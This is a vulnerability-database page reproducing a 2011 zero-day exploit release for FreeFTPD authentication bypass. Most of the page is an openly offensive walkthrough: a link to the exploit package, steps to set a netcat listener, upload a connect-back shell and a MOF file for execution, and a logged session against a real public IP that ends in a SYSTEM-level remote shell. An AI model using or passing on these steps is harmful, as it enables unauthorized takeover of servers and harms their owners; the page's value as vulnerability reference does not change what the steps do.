Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

FreeFTPD Remote Authentication Bypass Zeroday Exploit

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 16 Views

FreeFTPD Remote Authentication Bypass Zeroday Exploit. All Versions Vulnerabl

Code

                                                FreeFTPD all versions Remote System Level Exploit Zero-Day -- No username needed, straightforward rooting!
Discovered & Exploited By Kingcope
Year 2011
--

http://www.exploit-db.com/sploits/23079.zip

Example banner: WeOnlyDo-wodFTPD 2.3.6.165

This package includes all you need to successfully root any version of FreeFTPD:

* Modified version of ssh.exe (FreeFTPD authentication bypass)
* sftp.exe for connecting to the server
* nullevent.exe connect back shell that is uploaded to the server
* nullevent.mof file which is uploaded to the server to execute the connect back shell
* MSVCR100.dll that is needed by nullevent.exe 
* scan logs for your pleasure!

We make use of the STUXNET technique to execute code, So let's go:

1.) Setup a netcat on a host you have, firewall open on the listening port
2.) modify nullevent.mof in an editor (where the ip and port is) according to your netcat config
3.) connect to the FreeSSHD: sftp.exe -S ./ssh.exe <ip/host>
4.) upload (put) nullevent.exe: put nullevent.exe
5.) upload (put) MSVCR100.dll: put MSVCR100.dll
6.) upload (put) nullevent.mof to wbem/mof/nullevent.mof: put nullevent.mof wbem/mof/nullevent.mof
7.) Enjoy your system shell which will blink up on you netcat after 1 minute!!
8.) Cleanup by deleting nullevent.exe located in c:\windows\system32\
8.)  Enjoy!
9.)  Enjoy!
10.) Enjoy!

Example exploitation session:

C:\Users\KC\Desktop\FreeFTPD_0day>sftp -S ./ssh.exe 83.241.214.171
Could not create directory '/home/KC/.ssh'.
The authenticity of host '83.241.214.171 (83.241.214.171)' can't be established.
RSA key fingerprint is a8:ba:6d:0a:c6:ae:8b:a1:b6:47:7b:43:a8:de:4b:8e.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/home/KC/.ssh/known_hosts).
Connected to 83.241.214.171.
sftp> put nullevent.exe
Uploading nullevent.exe to /nullevent.exe
nullevent.exe                                                                         100% 7168     7.0KB/s   00:00
sftp> put MSVCR100.dll
Uploading MSVCR100.dll to /MSVCR100.dll
MSVCR100.dll                                                                          100%  751KB  22.8KB/s   00:33
sftp> put nullevent.mof wbem/mof/nullevent.mof
Uploading nullevent.mof to /wbem/mof/nullevent.mof
nullevent.mof                                                                         100%  691     0.7KB/s   00:00
sftp>

[root@vs2067037 ~]# nc -v -l 443
Connection from 83.231.224.193 port 443 [tcp/https] accepted
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>whoami
whoami
nt authority\system

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
freeftpdremote authentication bypassexploitzero-daykingcopestuxnetsystem shellnetcatmsvcr100.dllfreesshdsftp.exemodified ssh.exenullevent.exe
16